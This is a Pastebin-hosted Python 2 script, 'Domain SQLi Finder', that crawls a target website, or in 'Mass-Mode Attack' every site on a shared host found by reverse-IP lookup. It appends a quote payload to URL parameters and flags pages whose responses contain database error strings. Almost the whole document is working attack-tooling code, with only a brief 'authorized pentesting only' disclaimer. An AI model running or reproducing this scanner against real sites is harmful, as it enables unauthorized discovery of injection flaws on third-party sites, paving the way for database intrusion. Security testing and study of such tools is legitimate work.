0xspade

Domain SQLi Finder

Aug 25th, 2016
662
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 25.40 KB | None | 0 0
  1. <script src="//my.hellobar.com/d47b5e9fed3fd1926808aefff5134faac871bb04.js" type="text/javascript" charset="utf-8" async="async"></script>#!/usr/local/bin/python2.7
  2.  
  3. # This was written for a Penetration Test assessment and is for educational purpose only. Use it at your own risk.
  4. # Author will be not responsible for any damage!
  5. # Intended for authorized Web Application Pen Testing only!
  6.  
  7. import chilkat, sys, os, argparse, httplib, urlparse, urllib2, re, time, datetime
  8. import DomainReverseIPLookUp
  9.  
  10. # The following three variables get their values from command line args, either take user value or stick with the default ones
  11. pagesToCrawl = ""                                   # Number of pages to crawl in a website
  12. maxVulInjectableParam = ""                          # Maximum number of vulnerable pages (parameters) to find
  13. output = ""                                         # Output file name - append mode (a)
  14. reverseLookUp = "DSQLiReverseLookUp.txt"            # Output file name for reverseIP lookup - write+ mode (w+)
  15. crawlDump = 'DSQLiCrawlerOutput.txt'                # Stores crawling result for current crawl only - write+ mode (w+)
  16. uniqueLinksDump = 'DSQLiUniqueLinks.txt'            # Stores crawling result for current scan only - write+ mode (w+)
  17. errorDump = 'DSQLiErrorDump.txt'                    # Dumps handled errors - append mode (a)
  18. sitesToScan = ""                                    # Stores maximum number of sites to scan on domain in case of Mass-Mode Attack
  19. maxVulSites = ""                                    # Stores maximum number of vulnerable sites to find with Mass-Mode Attack
  20.  
  21. reverseFlag = 0                                     # Determines whether reverseLookUp file is generated by script or user supplies it
  22. maxVulSitesFlag = 0                                 # Keeps track of how many vulnerable sites have been found in Mass-Mode Attack
  23. verbose = 0                                         # Determines what messages to display on screen (0 or 1)
  24.  
  25. sqlPayload = ["1'"]                                 # SQL Payloads, add in more here
  26. sqlErrors = [
  27.     "Warning",
  28.     "mysql_fetch_array()",
  29.     "mysql_fetch_object()",
  30.     "mysql_num_rows()",
  31.     "mysql_free_result()",
  32.     "mysql_real_escape_string()",
  33.     "mysql_connect()",
  34.     "mysql_select_db()",
  35.     "mysql_query()",
  36.     "You have an error in your SQL syntax",
  37.     "Unclosed quotation mark after the character string",
  38.     "Server Error in '/' Application",
  39.     "Microsoft OLE DB Provider for ODBC Drivers error",
  40.     "supplied argument is not a valid OCI8-Statement",
  41.     "microsoft jet database engine"
  42.     ]                                               # add in more here
  43.  
  44. # Determine platform and clear screen
  45. def clear_screen():
  46.     if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
  47.         os.system('clear')
  48.     elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
  49.         os.system('cls')
  50.     else:
  51.         pass    
  52.  
  53.  
  54. # Banner    - Set the formatting mororn, it's fucked up atm
  55. def banner():
  56.     print """
  57.     ##################################################################
  58.                
  59.         Domain SQLi Finder - (Error Based Tool-v0.1)
  60.                b0nd@garage4hackers.com
  61.                                
  62.                 Greetz to:
  63.             (www.garage4hackers.com)   
  64.      GGGGGG\                                                  
  65.     GG  __GG\                                                
  66.     GG /  \__| aaaaaa\  rrrrrr\ aaaaaa\  gggggg\  eeeeee\
  67.     GG |GGGG\ \____aa\ rr  __rr\ \____aa\ gg  __gg\ ee  __ee\
  68.     GG |\_GG | aaaaaaa |rr |  \__|aaaaaaa |gg /  gg |eeeeeeee |
  69.     GG |  GG |aa  __aa |rr |     aa  __aa |gg |  gg |ee   ____|
  70.     \GGGGGG  |\\aaaaaaa |rr |     \\aaaaaaa |\ggggggg |\\eeeeeee\
  71.      \______/  \_______|\__|      \_______| \____gg | \_______|
  72.                                                gg\  gg |          
  73.                                             gggggg  |          
  74.                                             \______/
  75.             Usage: python Domain-SQLi-Finder.py -h
  76.     ###################################################################
  77.  
  78.    """
  79.     print "\tUsage: python %s [options]" % sys.argv[0]
  80.     print "\t\t-h help\n"
  81.     call_exit()
  82.    
  83. def call_exit():
  84.     print "\n\tExiting ...........\n"
  85.     sys.exit(0)
  86.        
  87. # Tests SQLi on all unique links and parameters by appending sqlPayload and checking the source
  88. def check_SQLi(uniqueUrls):
  89.     sqliUrls = []                                           # This list will contain sorted URLs ready to be appended with sqlPayloads
  90.     flag = 0                                                # Variable to check whether desired 'n' number of vulnerable pages have been found
  91.    
  92.     for link in uniqueUrls:                                 # This list has all unique URLs but since a single unique URL might have multiple parameters
  93.         num = link.count("=")                               # so this loop prepares URLs with one parameter each
  94.         if num > 0:
  95.             for x in xrange(num):
  96.                 x = x + 1
  97.                 url = link.rsplit("=",x)[0]+"="
  98.                 sqliUrls.append(url)
  99.    
  100.     sqliUrls = list(set(sqliUrls))                          # By now this list has all injectable parameters ready to append sqlPayload
  101.     parsed = urlparse.urlparse(link)                        # Later used to obtain website name
  102.     now = datetime.datetime.now()                           # Current time of scanning to put in DSQLiResults output file
  103.    
  104.     try:
  105.         fd_output = open(output, 'a')
  106.         fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n")          # Writing URL base name to output file
  107.     except IOError:
  108.         print "\n\t[!] Error - could not open|write file %s \n" % output
  109.    
  110.     if verbose == 1:
  111.         print "\n[*] Testing SQLi on following URLs:"
  112.         for link in sqliUrls:
  113.             print "\t[-] URL: ", link
  114.     else:
  115.         print "\n[*] Testing SQLi on URL's ....."
  116.    
  117.     # In the following loop, the counter flag plays role to find 'n' number of vulnerable pages. If limited number of pages
  118.     # have to be found, the value of flag counter determines whether script has found those number of pages or not. Once matches,
  119.     # it breaks all loops and come out. Else, if it has not touched the limit but links in sqliUrls have finished, control comes
  120.     # out of all loops. But if (0) i.e. all pages have to be found, flag plays no considerable role other than incrementing itself.
  121.    
  122.     for link in sqliUrls:
  123.         for pload in sqlPayload:
  124.             if verbose == 1:
  125.                 print "\n\n\tTesting: %s\n" % (link+pload)
  126.                
  127.             try:
  128.                 source = urllib2.urlopen(link+pload).read()                                     # Appending sqlPayload and reading source for errors
  129.             except urllib2.HTTPError, err:
  130.                 if err.code == 500:
  131.                     if verbose == 1:
  132.                         print "\t\t[!] Error - HTTP Error 500: Internal Server Error"
  133.                         print "\t\t[-] Continuing with next link"
  134.                     continue
  135.                 else:
  136.                     if verbose == 1:
  137.                         print "\t\t[!] Error - HTTP Error xxx"
  138.                         print "\t\t[-] Continuing with next link"
  139.                     continue
  140.             for errors in sqlErrors:               
  141.                 if re.search(errors, source) != None:                                           # If any sql error found in source
  142.                     fd_output.write("\t\t[!] BINGO!!! SQLi Vulnerable " + link+pload + "\n")
  143.                     print "\n\t\t[!] BINGO!!! - SQLi FOUND in: %s (%s) \n" % (link+pload, errors)
  144.                    
  145.                     if maxVulInjectableParam != 0:                                              # i.e. if 'n' number of vulnerable parameters have to be found
  146.                         if flag < maxVulInjectableParam:
  147.                             flag = flag + 1
  148.                         else:
  149.                             break
  150.                     else:                                                                       # i.e if all vulnerable pages have to be found     
  151.                         flag = flag + 1
  152.                     break
  153.                 else:
  154.                     if verbose == 1:
  155.                         print "\t\t[-] Not Vulnerable - String (%s) not found in response" % errors
  156.                     else:
  157.                         pass
  158.             if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:                    # i.e. if 'n' pages have already been found
  159.                 break
  160.        
  161.         if maxVulInjectableParam != 0 and flag == maxVulInjectableParam:                        # i.e. if 'n' pages have already been found
  162.             break
  163.    
  164.     if flag != 0:
  165.         print "\n\t[-] Target is vulnerable to SQLi, check log file"
  166.         print "\t\t[-] %d injectable vulnerable parameters found" % (flag)
  167.        
  168.         global maxVulSitesFlag
  169.         maxVulSitesFlag = maxVulSitesFlag + 1               # Increment the flag which determines how many vulnerable sites to find in case of Mass-Mode Attack
  170.        
  171.     else:
  172.         print "\n\t[-] Target is not vulnerable to SQLi"
  173.         try:
  174.             fd_output.write("\t\tTarget is not vulnerable to SQLi attack\n")
  175.             fd_output.close()                                                   # Close the file on completion of each URL, so that log file could be seen for
  176.         except IOError:                                                         # result instantly, instead of waiting for whole script to finish
  177.             print "\n\t[!] Error - file I/O error\n"
  178.        
  179.     try:
  180.         fd_output.close()
  181.     except IOError:
  182.         pass
  183.    
  184.  
  185. # Just finds the unique URLs from all crawled URLs and saves to list
  186. # Concept is: Parse the URL, find its injectable parameter(s), check the combination of [netlock, path and injectable parameters] with earlier found
  187. # combinations, if unique, update our uniqueUrls list else goto next URL and parse it for same procedure
  188. def unique_urls(unsortedUrls):
  189.     print "\n[*] Finding unique URL's ....."
  190.    
  191.     list_db = []                                                                # Used as temporary storage to compare parameters with already found ones
  192.     uniqueUrls = []                                                             # This one will finally have unique URLs in it
  193.    
  194.     for link in unsortedUrls:
  195.         list_tmp = []                                                           # Temporary list to store query parameters only
  196.         try:
  197.             parsed = urlparse.urlparse(link)
  198.             num = parsed.query.count("=")                                       # Just checking the parsed.query portion for number of injectable parameters it has
  199.             x = 0
  200.  
  201.             for x in xrange(num):
  202.                 list_tmp.append(parsed.query.split("&")[x].rsplit("=",1)[0])    # list_tmp would have all injectable parameters in it as elements
  203.                 x = x + 1
  204.         except IndexError:
  205.             # In my case links generate error bcoz they include an external URl and increase the number of "=" in link.
  206.             # accordingly the loop run 1 extra time and generates out of index error
  207.            
  208.             if verbose == 1:
  209.                 print "\n\t[!] Error - List Index Out of Order - check %s and report to author" % (errorDump)
  210.  
  211.             try:
  212.                 fd_errorDump = open(errorDump, 'a')
  213.                 fd_errorDump.write("\n\t[*] Error occured inside unique_urls function for:\t" + parsed.query)
  214.             except IOError:
  215.                 print "\n\t[!] Error - could not open|write file %s \n" % errorDump
  216.             continue
  217.            
  218.         list_tmp = [parsed.netloc, parsed.path, list_tmp]
  219.        
  220.         if list_tmp in list_db:                                                 # For the first URL, this condition would definitely fail as list_db is empty
  221.             continue                                                            # i.e. same parameters but with different values have been found, so continue
  222.         else:
  223.             list_db.append(list_tmp)                                            # Update the found unique parameters
  224.             uniqueUrls.append(link)                                             # Update the List with unique complete URLs
  225.    
  226.     if verbose == 1:
  227.         for link in uniqueUrls:
  228.             print "\t[-] Unique link found: ", link
  229.    
  230.     try:
  231.         fd_uniqueLinkDump = open(uniqueLinksDump, 'a')
  232.         for link in uniqueUrls:
  233.             fd_uniqueLinkDump.write(link + '\n')
  234.         fd_uniqueLinkDump.close()
  235.     except IOError:
  236.         print "\n\t[!] Error - could not open|write file %s \n" % uniqueLinksDump
  237.        
  238.     check_SQLi(uniqueUrls)                                                      # Call SQLi check function to test SQLi vulnerability
  239.  
  240.  
  241. # Function crawls to find "linksToCrawl" number of pages from URL.
  242. # It stops when limit reaches or no more pages left to crawl, which ever meets the condition first
  243. def crawl_site(url):
  244.     print "[*] Attacking URL -> ", url
  245.     print "\t[*] Crawling %s to find injectable parameters" % url
  246.    
  247.     spider = chilkat.CkSpider()                                                 # Using Chilkat Library. Some modules are free.
  248.     spider.Initialize(url)
  249.     spider.AddUnspidered(url)
  250.     spider.CrawlNext()
  251.  
  252.     print "\n\t[-] Website Title: ", spider.lastHtmlTitle()
  253.     print "\n\t[-] Crawling Pages",                                             # The trailing comma to show progress bar in case of non-verbose
  254.    
  255.     crawlerOutput = []                                                          # This list would have all the linksToCrawl number of pages of URL
  256.    
  257.     for i in range(0,int(pagesToCrawl)):
  258.         success = spider.CrawlNext()
  259.         if (success == True):
  260.             if verbose == 1:
  261.                 if i%50 == 0:
  262.                     print "\n[-] %d percent of %d pages to crawl complete\n" % ((i*100)/pagesToCrawl, pagesToCrawl)
  263.                 print "\t", spider.lastUrl()
  264.             else:
  265.                 sys.stdout.flush()
  266.                 print ".",                                                      # In non verbose case, it prints dot dot dot to show the progress
  267.             crawlerOutput.append(spider.lastUrl())
  268.  
  269.         else:    
  270.             if (spider.get_NumUnspidered() == 0):
  271.                 print "\n\t[-] No more URLs to spider"
  272.                 i = i - 1                                                       # Need to decrement, else gives +1 count for total pages crawled
  273.                 break
  274.             else:
  275.                 print spider.lastErrorText()
  276.                 continue
  277.        
  278.         spider.SleepMs(10)
  279.    
  280.     try:
  281.         fd_crawlDump = open(crawlDump, 'a')                                     # Logs
  282.         for link in crawlerOutput:
  283.             fd_crawlDump.write(link + '\n')
  284.         fd_crawlDump.close()       
  285.     except IOError:
  286.         print "\n\t[!] Error - could not open|write file %s \n" % crawlDump
  287.            
  288.     print "\n\t[-] Crawled %d pages successfully" % (i+1)
  289.    
  290.     if verbose == 1:
  291.         print "\n[*] Parsing URL's to collect links with '=' in them ....."
  292.    
  293.     urlsWithParameters = []                                                 # This list would have only those URLs which has '=' in them i.e. injectable parameter(s)
  294.     for link in crawlerOutput:
  295.         if link.count("=") > 0:
  296.             urlsWithParameters.append(link)
  297.    
  298.     if urlsWithParameters != []:
  299.         if verbose == 1:
  300.             print "\t[-] Done"
  301.         unique_urls(urlsWithParameters)                                     # Time to find unique URLs among all with '=' in them
  302.     else:
  303.         print "\n\t[!] No injectable parameter found"
  304.         now = datetime.datetime.now()                                       # Current time to put in DSQLiResults output file
  305.         try:
  306.             parsed = urlparse.urlparse(url)
  307.             fd_output = open(output, 'a')
  308.             fd_output.write("\n\tTarget Site =>\t" + parsed.netloc + "\t(" + (now.strftime("%Y-%m-%d %H:%M")) + ")\n")          # Writing URL base name to output file
  309.             fd_output.write("\t\tNo injectable parameter found\n")
  310.             fd_output.close()
  311.         except IOError:
  312.             print "\n\t[!] Error - could not open|write file %s \n" % output
  313.        
  314.  
  315. # Function tries to find SQLi on sites on shared hosting
  316. def attack_Domain(durl):
  317.     sites = []
  318.     counter = 0                                                             # This keeps check on how many sites have been scanned so far
  319.     deadLinks = 0                                                           # This keeps check on how many dead links have been found
  320.     print "\n[*] Attacking Domain -> ", durl
  321.    
  322.     if reverseFlag == 0:                                                    # i.e. if --reverse switch is not used on console. That means, do reverseIP Lookup and generate result
  323.         DomainReverseIPLookUp.generate_reverse_lookup(durl, reverseLookUp, verbose)     # pass domain url, output file name and verbose level
  324.         try:
  325.             fd_reverseLookUp = open(reverseLookUp, 'r')
  326.             for url in fd_reverseLookUp.readlines():
  327.                 sites.append(url)                                           # List sites contains all the domains hosted on server
  328.            
  329.         except IOError:
  330.             print "\n\t[!] Error - %s file missing" % reverseLookUp
  331.             print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
  332.             call_exit()
  333.    
  334.     elif reverseFlag == 1:                                                  # i.e. if --reverse switch is mentioned, then don't do reverse IP Lookup and read data from already generated file
  335.         try:
  336.             fd_reverseLookUp = open(reverseLookUp, 'r')
  337.             for url in fd_reverseLookUp.readlines():
  338.                 sites.append(url)                                           # List sites contains all the domains hosted on server
  339.            
  340.         except IOError:
  341.             print "\n\t[!] Error - %s file missing" % reverseLookUp
  342.             print "\t[-] Generate it using --reverse switch or get domains from some reverse IP lookup website"
  343.             call_exit()
  344.    
  345.     if len(sites)%10 != 0:
  346.         sites = sites[0:(len(sites)%10)]
  347.     else:
  348.         sites = sites[0:((len(sites)+2)%10)]
  349.    
  350.     for site in sites:
  351.         try:
  352.             print "\n\t#################################################"
  353.             print "\n\t [-] Number of alive sites scanned so far: ", counter
  354.             print "\n\t [-] Number of vulnerable sites found so far: ", maxVulSitesFlag
  355.             print "\n\t [-] Number of dead sites found so far: ", deadLinks
  356.             print "\n\t#################################################\n"
  357.             if maxVulSites != 0:                                            # i.e. if not all vulnerable sites are to be found
  358.                 if maxVulSitesFlag == maxVulSites:
  359.                     print "\n\t[-] Stopping scan - the required number of vulnerable sites have been found"
  360.                     break
  361.        
  362.             if site[:7] != "http://":                                       # prepend http:// to url, if not already done by user
  363.                 site = "http://" + site                                     # what about https site?
  364.        
  365.             site = site[:-1]                                                # remove \n at the end of each element
  366.    
  367.             print "-"*80
  368.             print "\n[*] Target URL - %s ....." % (site)                    # Verify URL for its existance
  369.             if verify_URL(site) == True:                                    # Function call to verify URL for existance
  370.                 print "\t[-] URL Verified\n"
  371.                 crawl_site(site)                                            # Pass the site to crawl function
  372.             else:
  373.                 print "\n\t[-] URL %s could not be verified, continuing with next target in list" % site
  374.                 deadLinks = deadLinks + 1
  375.                 continue
  376.         except KeyboardInterrupt:
  377.             decision = raw_input("\n\t[?] how do you want to proceed? [(C)ontinue with next target in list or (q)uit]: ")
  378.             if decision == 'C' or decision == 'c':
  379.                 continue
  380.             elif decision == 'q':
  381.                 print "\n[!] Error - user aborted"
  382.                 call_exit()
  383.             else:
  384.                 print "\n\tEnjoy: oo=========> (|)"
  385.                 call_exit()
  386.        
  387.         counter = counter + 1                                               # Counting for only those sites which really got scanned
  388.                                                                             # for those whose URLs couldn't be verified, not incrementing counter
  389.    
  390.     print "\n\n[*] Scanning Finished"
  391.     print "\n\t[-] Total Number of vulnerable sites found in domain: ", maxVulSitesFlag
  392.     print "\t[-] Check log file %s for result" % output
  393.  
  394. # Function to verify URL is alive and accessible
  395. def verify_URL(url):
  396.     good_codes = [httplib.OK, httplib.FOUND, httplib.MOVED_PERMANENTLY]     # 200, 302, 301 respectively
  397.     host, path = urlparse.urlparse(url)[1:3]                                # elems [1] and [2] - netloc and path
  398.        
  399.     try:
  400.         conn = httplib.HTTPConnection(host)
  401.         conn.request('HEAD', path)
  402.         status = conn.getresponse().status
  403.         conn.close()
  404.     except StandardError:
  405.         status = None
  406.    
  407.     return status in good_codes                                             # Either 'True' or 'False'
  408.    
  409.    
  410. # Parse command line arguments, allowed combinations and mandatory values
  411. def parseArgs():
  412.     parser = argparse.ArgumentParser(description = 'Domain SQLi Finder - Error Based Tool v0.1', epilog="Report bugs to b0nd@garage4hackers.com | www.garage4hackers.com")
  413.     parser.add_argument('--verbose', nargs='?', dest='verbose', default=0, help='set verbosity [0 (default) : Off | 1 : On]', type=int)
  414.     parser.add_argument('--output', metavar='output.txt', dest='siteOutput', default='DSQLiResults.txt', help='output file to store results in (default=DSQLiResults.txt)')
  415.    
  416.     group1 = parser.add_argument_group('Single-Mode Attack: Target One Site on Domain')
  417.     group1.add_argument('--url', nargs=1, dest='URL', help='target site to find SQLi')
  418.     group1.add_argument('--crawl', nargs='?', dest='crawl', default=500, help='number of pages to crawl (default=500)', type=int)
  419.     group1.add_argument('--pages', nargs='?', dest='pages', default=0, help='number of vulnerable pages (injectable parameters) to find in site (default=0 i.e. all)', type=int)
  420.    
  421.     # Mind it - In group1 and group2, same paramters "crawl" and "pages" are used. So on console whether uses --crawl or --dcrawl,
  422.     # they would update the same variable "crawl" and ultimately the global variable pagesToCrawl. Same goes for "pages"
  423.    
  424.     group2 = parser.add_argument_group('Mass-Mode Attack: Target All Sites on Domain')
  425.     group2.add_argument('--durl', nargs=1, dest='DURL', help='target domain to find SQLi')
  426.    
  427.     group2.add_argument('--sites', nargs='?', dest='sites', default=0, type=int, help='number of sites to scan on domain (default=0 i.e. all)')
  428.     group2.add_argument('--vulsites', nargs='?', dest='vulsites', default=0, type=int, help='number of vulnerable sites to find on domain (default=0 i.e. all possible)')
  429.     group2.add_argument('--dcrawl', nargs='?', dest='crawl', default=500, type=int, help='number of pages to crawl in each site (default=500)')
  430.     group2.add_argument('--dpages', nargs='?', dest='pages', default=0, type=int, help='number of vulnerable pages (injectable parameters) to find in each site (default=0 i.e. all)')
  431.     group2.add_argument('--reverse', metavar='output.txt', nargs=1, dest='reverseLookUp', help='output file to store found sites on server and|or read Reverse IP Lookup results from file')
  432.    
  433.     args = parser.parse_args()
  434.    
  435.     # Check exclusiveness of options
  436.     if (args.URL != None and args.DURL != None):
  437.         print "\n\t[!] Error - Mutually exclusive options (--url, --durl)"
  438.         call_exit()
  439.            
  440.     # Check existance of at least one option
  441.     if (args.URL == None and args.DURL == None):
  442.         print "\n\t[!] Error - No mode selected (--url, --durl)"
  443.         call_exit()
  444.        
  445.     # Check if value is passed to args. e.g. --crawl without value would pass "None" to it and program would crash
  446.     # all of these switches have default value, so user either don't mention them on command prompt or must put a value for them
  447.     if (args.crawl == None or args.pages == None or args.sites == None or args.vulsites == None):
  448.         print "\n\t[!] Error - Insufficient number of value(s) passed to argument(s)"
  449.         call_exit()
  450.    
  451.     # Check to make sure numeral value of vulsites is less than sites and pages < crawl
  452.     if args.sites < args.vulsites:
  453.         print "\n\t[!] Error - kidding? --sites shall be > --vulsites\n"
  454.         call_exit()
  455.     elif args.crawl < args.pages:
  456.         print "\n\t[!] Error - kidding? --(d)crawl shall be > --(d)pages\n"
  457.         call_exit()
  458.        
  459.     # Check if switch --reverse is used with --durl only
  460.     if ((args.URL != None) and (args.reverseLookUp != None)):
  461.         print "\n\t[!] Error - '--reverse' switch goes with Mass-Mode (--durl) attack only"
  462.         call_exit()
  463.        
  464.     global reverseLookUp                                                        # Declaring it here as it's been used couple of times in this fuction
  465.    
  466.     # Check verbosity (--verbose argument)
  467.     if args.verbose != None:                                                    # It would be none only when mentioned without any value i.e. --verbose <no value>
  468.         if args.verbose == 1:                                                   # and if that is the case, the global value of verbose is 0 already, so - verbose off
  469.             print "\n[*] Verbose Mode On"
  470.             global verbose                                                      # verbose global variable
  471.             verbose = 1
  472.            
  473.             if args.URL != None:                                                # Verbose mode for --url
  474.                 print "\t[-] Pages to crawl (default=500): ", (args.crawl)
  475.                 print "\t[-] Vulnerable injectable parameters (pages) to find in site (default=0 i.e. all): %d" % (args.pages)
  476.                 print "\t[-] Output file name: %s" % (args.siteOutput)
  477.                
  478.             if args.DURL != None:                                               # Verbose mode for --durl
  479.                 print "\t[-] Number of sites to scan on domain (default=0 i.e all): ", (args.sites)
  480.                 print "\t[-] Number of vulnerable sites to find on domain (default=0 i.e. all possible): ", (args.vulsites)
  481.                 print "\t[-] Pages to crawl in each site (default=500): ", (args.crawl)
  482.                 print "\t[-] Vulnerable injectable parameters (pages) to find in each site (default=0 i.e. all): %d" % (args.pages)
  483.                 if args.reverseLookUp != None:                                  # i.e. if on console the reverse.txt file names is mentioned
  484.                     print "\t[-] Reverse IP Look-up file needed to read domains from: %s" % (args.reverseLookUp[0])
  485.                 else:
  486.                     print "\t[-] Reverse IP Look-up output file: %s" % reverseLookUp
  487.                    
  488.                 print "\t[-] Final result output file: %s" % (args.siteOutput)
  489.  
  490.         else:                                                                   # i.e. if value 0 is passed to --verbose
  491.             print "\n[*] Verbose Mode Off"
  492.     else:                                                                       # i.e. verbose has None Value, it's been passed without value
  493.         print "\n[*] Vebose Mode Off (by default)"
  494.        
  495.     # By this point, either of --url, --durl or --aurl switch is enable
  496.     # Following assignments are for --url, --durl - see if you wish to put only relevant one and take rest in if args.DURL != None
  497.     # It's OK with current "common" crawl and pages parameters. If I assign parameter separately for --url and --durl then first I
  498.     # would need to define "dcrawl" and "dpages" and use them in combination with --durl
  499.     global pagesToCrawl
  500.     pagesToCrawl = args.crawl
  501.     global maxVulInjectableParam
  502.     maxVulInjectableParam = args.pages
  503.     global output
  504.     output = args.siteOutput
  505.     global sitesToScan
  506.     sitesToScan = args.sites
  507.     global maxVulSites
  508.     maxVulSites = args.vulsites
  509.        
  510.     # Single-Mode Attack (--url argument)
  511.     if args.URL != None:
  512.         if args.URL[0][:7] != "http://":                                    # prepend http:// to url, if not already done by user
  513.             args.URL[0] = "http://"+args.URL[0]                             # what about https site?
  514.                
  515.         print "\n[*] Verifying URL....."                                    # Verify URL for its existance
  516.         if verify_URL(args.URL[0]) == True:                                 # Function call to verify URL for existance
  517.             print "\t[-] URL Verified\n"
  518.             crawl_site(args.URL[0])                                         # Goto the function which deals with 1 URL
  519.         else:
  520.             print "\n\t[-] URL cound not be verified."
  521.             call_exit()
  522.    
  523.     # Mass-Mode Attack (--durl argument)
  524.     elif args.DURL != None:
  525.         if args.DURL[0][:7] != "http://":
  526.             args.DURL[0] = "http://"+args.DURL[0]
  527.            
  528.         # reverseLookUp doesn't have default value, so if not mentioned on console, it will be None. If not None, that means user wants to read reverse look-up
  529.         # which is already generated file, either using this code or copied from somewhere. In that case, i/p file must reside in same directory
  530.         if args.reverseLookUp != None:
  531.             reverseLookUp = args.reverseLookUp[0]
  532.            
  533.             global reverseFlag                                              # Determines whether reverseLookUp file is generated by script or user supplies it
  534.             reverseFlag = 1
  535.             attack_Domain(args.DURL[0])
  536.        
  537.         else:                                                               # i.e. --reverse is not mentioned on command prompt. Our code shall generate one.
  538.             print "\n[*] Verifying Domain - %s ....." % (args.DURL[0])
  539.             if verify_URL(args.DURL[0]) == True:
  540.                 print "\t[-] Domain Verified\n"
  541.                 attack_Domain(args.DURL[0])
  542.             else:
  543.                 print "\n\t[-] Domain cound not be verified."
  544.                 call_exit()
  545.    
  546.  
  547. def main():
  548.     #clear_screen()
  549.     if len(sys.argv) < 2:
  550.         banner()
  551.    
  552.     parseArgs()                                                             # Parse command line arguments
  553.     call_exit()
  554.    
  555.  
  556. # ---------------------------------------- Code execution starts here ------------------------
Add Comment
Please, Sign In to add comment